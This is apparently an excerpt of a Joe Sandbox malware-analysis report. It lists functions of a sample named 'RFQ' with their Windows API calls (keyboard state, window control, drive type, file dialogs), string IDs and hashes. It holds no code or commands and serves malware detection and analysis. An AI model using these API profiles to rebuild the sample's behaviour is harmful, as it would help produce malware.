                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                          • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                          • _wcscpy.LIBCMT ref: 004787E5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                          • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          • API String ID: 3052893215-2127371420
                                                                          • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                          • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                          • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                          • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                          Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                          • __swprintf.LIBCMT ref: 0045E7F7
                                                                          • _wprintf.LIBCMT ref: 0045E8B3
                                                                          • _wprintf.LIBCMT ref: 0045E8D7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 2295938435-2354261254
                                                                          • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                          • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                          Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                          • String ID: %.15g$0x%p$False$True
                                                                          • API String ID: 3038501623-2263619337
                                                                          • Opcode ID: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                                          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                          • Opcode Fuzzy Hash: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                                          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                          Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                          • __swprintf.LIBCMT ref: 0045E5F6
                                                                          • _wprintf.LIBCMT ref: 0045E6A3
                                                                          • _wprintf.LIBCMT ref: 0045E6C7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 2295938435-8599901
                                                                          • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                          • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                          Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 00443B67
                                                                            • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                          • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                          • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                          • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                          • IsWindow.USER32(?), ref: 00443C3A
                                                                          • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                          • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                          • String ID: BUTTON
                                                                          • API String ID: 1834419854-3405671355
                                                                          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                          Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                          • LoadStringW.USER32(00000000), ref: 00454040
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • _wprintf.LIBCMT ref: 00454074
                                                                          • __swprintf.LIBCMT ref: 004540A3
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                          • API String ID: 455036304-4153970271
                                                                          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                          Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                          • _memmove.LIBCMT ref: 00467EB8
                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                          • _memmove.LIBCMT ref: 00467F6C
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                          • String ID:
                                                                          • API String ID: 2170234536-0
                                                                          • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                          • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                          Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                          • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                          • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                          • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                          • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                          • GetKeyState.USER32(00000012), ref: 00453E26
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                          • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                          Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                          • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                          • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                          • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                          • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                          • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                          • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                          Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                          • DeleteObject.GDI32(?), ref: 0047151E
                                                                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                          • DeleteObject.GDI32(?), ref: 004715EA
                                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                          • String ID:
                                                                          • API String ID: 3218148540-0
                                                                          • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                          • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                          • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                          • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                          Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                          • String ID:
                                                                          • API String ID: 136442275-0
                                                                          • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                          • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                          • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                          • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                          Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcsncpy.LIBCMT ref: 00467490
                                                                          • _wcsncpy.LIBCMT ref: 004674BC
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • _wcstok.LIBCMT ref: 004674FF
                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
